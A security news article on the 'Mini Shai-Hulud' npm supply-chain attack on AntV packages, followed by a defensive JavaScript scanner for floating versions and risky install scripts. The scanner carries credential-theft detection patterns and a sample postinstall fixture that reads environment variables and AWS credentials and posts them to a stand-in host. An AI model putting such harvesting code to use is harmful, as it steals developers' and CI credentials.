
Massive Npm Supply Chain Attack Hits AntV Ecosystem; Hundreds of JavaScript Packages Compromised
Why It Matters
The breach demonstrates how a single compromised maintainer account can jeopardize vast swaths of enterprise software, exposing cloud and CI/CD credentials on every machine that installed the poisoned versions and underscoring the systemic risk in the JavaScript supply chain.
Key Takeaways
- Attack compromised over 300 npm packages in the AntV ecosystem
- Malicious updates stole AWS, GitHub, Docker, and Kubernetes credentials
- Malware spread within 22 minutes, exploiting automated dependency updates
- Experts urge pinning exact versions and rotating exposed secrets immediately
- Incident underscores the fragility of the JavaScript supply chain and its deep transitive dependency graphs
Pulse Analysis
The recent "Mini Shai-Hulud" campaign marks a new escalation in npm supply-chain attacks, targeting the AntV ecosystem that powers data-intensive dashboards across finance and analytics firms. By seizing the trusted maintainer account "atool," threat actors injected malicious code into high-profile libraries such as @antv/g2 and echarts-for-react. The tactic exploits the npm trust model: a version published under a maintainer's account is accepted as that maintainer's work, and the floating semver ranges (^ and ~) found in most package.json files let any fresh install or automated dependency update pull the newest matching version. A malicious release therefore reaches downstream builds within minutes of publication, with no action by the downstream developers.
Technical analysis reveals the payload is more than a simple backdoor; it scrapes environment variables and configuration files to exfiltrate AWS access keys, GitHub tokens, Docker credentials and socket paths, and Kubernetes secrets. Where the Docker socket is reachable from inside a container, the code also attempts to use it to escape the container, turning a compromised developer workstation or CI runner into a foothold for lateral movement within cloud infrastructure. The 22-minute spread reported for the campaign illustrates how automated dependency resolution amplifies an attack: a single compromised package becomes a worm-like vector that traverses complex dependency graphs.
Industry response emphasizes hardening the npm ecosystem: pinning exact package versions and installing from a committed lockfile (npm ci rather than npm install), disabling install-time lifecycle scripts, and rotating any credentials that may have been exposed. Because the payload harvests whatever is in the environment, every secret present on a machine that installed an affected version should be treated as exposed, not only those confirmed stolen. Microsoft and leading security firms recommend continuous monitoring for anomalous outbound traffic and regular secret audits in CI/CD pipelines. The incident reinforces a broader trend, with over 20% of npm packages inheriting known vulnerabilities through transitive dependencies, and highlights the urgent need for supply-chain risk management tools and stricter maintainer verification processes to protect modern JavaScript applications.
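The two checks below put the payload description and the hardening advice above into practice. This is an added example written for this article, not code from the attackers, from AntV, from npm or from any vendor mentioned: it flags floating version ranges in a project manifest (the mechanism by which a freshly published malicious version is pulled automatically), lists installed packages that declare npm lifecycle scripts, and statically scans those scripts for the credential-harvesting behaviour the analysis describes. The indicator strings, the sample manifest and the hypothetical package "example-widget" are all constructed for illustration; the .npmrc keys are real npm configuration options.

```javascript
'use strict';

// Added example (not from the article or any project it names). All sample
// inputs are constructed; "example-widget" is a hypothetical package.

// Exact semver version, optionally with a pre-release tag: "5.1.2", "1.0.0-rc.1".
const EXACT_VERSION = /^\d+\.\d+\.\d+(-[0-9A-Za-z.-]+)?$/;

// Returns [{section, name, spec}] for every dependency whose spec is not pinned,
// i.e. a range under which a lockfile-less install would take the newest match.
function findFloatingRanges(pkg) {
  const sections = ['dependencies', 'devDependencies', 'optionalDependencies'];
  const out = [];
  for (const section of sections) {
    for (const [name, spec] of Object.entries(pkg[section] || {})) {
      if (!EXACT_VERSION.test(spec)) out.push({ section, name, spec });
    }
  }
  return out;
}

// npm runs these hooks during `npm install` unless ignore-scripts is set.
const LIFECYCLE = ['preinstall', 'install', 'postinstall', 'prepare'];

// Indicators modelled on the article's description of the payload (env scraping,
// AWS/GitHub/Docker/Kubernetes credential files, the Docker socket, outbound
// HTTP). These regexes are assumptions for a static scan, not real signatures.
const INDICATORS = [
  { id: 'env-scrape',   re: /process\.env\b/ },
  { id: 'aws-creds',    re: /\.aws[\\\/]credentials|AWS_SECRET_ACCESS_KEY/ },
  { id: 'github-token', re: /GITHUB_TOKEN|GH_TOKEN|\.git-credentials/ },
  { id: 'docker',       re: /docker\.sock|\.docker[\\\/]config\.json/ },
  { id: 'kubernetes',   re: /\.kube[\\\/]config|KUBECONFIG|serviceaccount[\\\/]token/ },
  { id: 'exec',         re: /child_process|execSync|spawnSync/ },
  { id: 'egress',       re: /https?\.request\(|fetch\(|XMLHttpRequest/ },
];

// installed: [{name, version, scripts, files: {<path>: <source>}}]
// One finding per package that declares a lifecycle hook, with the indicator
// ids matched anywhere in that package's script sources.
function auditLifecycleScripts(installed) {
  const findings = [];
  for (const pkg of installed) {
    const hooks = LIFECYCLE.filter((h) => pkg.scripts && pkg.scripts[h]);
    if (hooks.length === 0) continue;
    const source = Object.values(pkg.files || {}).join('\n');
    const indicators = INDICATORS.filter((i) => i.re.test(source)).map((i) => i.id);
    findings.push({ name: pkg.name, version: pkg.version, hooks, indicators });
  }
  return findings;
}

// Hardened .npmrc matching the recommendations in the article (real npm keys).
function hardenedNpmrc() {
  return [
    'ignore-scripts=true', // do not run dependencies' preinstall/install/postinstall
    'save-exact=true',     // `npm install x` records "x": "1.2.3", not "^1.2.3"
    'package-lock=true',   // always maintain package-lock.json; use `npm ci` in CI
  ].join('\n');
}

// Constructed sample manifest (not a real project).
const SAMPLE_PACKAGE_JSON = {
  name: 'dashboard',
  dependencies: { '@antv/g2': '^5.1.0', react: '18.2.0', lodash: '~4.17.0' },
  devDependencies: { typescript: '5.4.2', vitest: '*' },
};

// Constructed installed packages: one pinned library with no hooks, and a
// hypothetical "example-widget" whose postinstall script shows the behaviour
// the article attributes to the payload (env dump, AWS credentials, egress).
const SAMPLE_INSTALLED = [
  { name: 'react', version: '18.2.0', scripts: {}, files: {} },
  {
    name: 'example-widget',
    version: '2.0.1',
    scripts: { postinstall: 'node setup.js' },
    files: {
      'setup.js': [
        "const fs = require('fs'), os = require('os'), https = require('https');",
        "const loot = { env: process.env, aws: fs.readFileSync(os.homedir() + '/.aws/credentials', 'utf8') };",
        "https.request({ host: 'collector.invalid', method: 'POST' }).end(JSON.stringify(loot));",
      ].join('\n'),
    },
  },
];

console.log(JSON.stringify({
  floating: findFloatingRanges(SAMPLE_PACKAGE_JSON),
  lifecycle: auditLifecycleScripts(SAMPLE_INSTALLED),
  npmrc: hardenedNpmrc(),
}, null, 2));
```

On the sample input the scan reports three floating ranges (@antv/g2, lodash, vitest) and one package with a postinstall hook whose script matches the env-scrape, aws-creds and egress indicators. In a real tree the installed list would be built by walking node_modules and reading each package.json plus the files its hooks reference. Note that ignore-scripts=true also suppresses a dependency's legitimate native build steps, so packages that need them must be rebuilt explicitly after install.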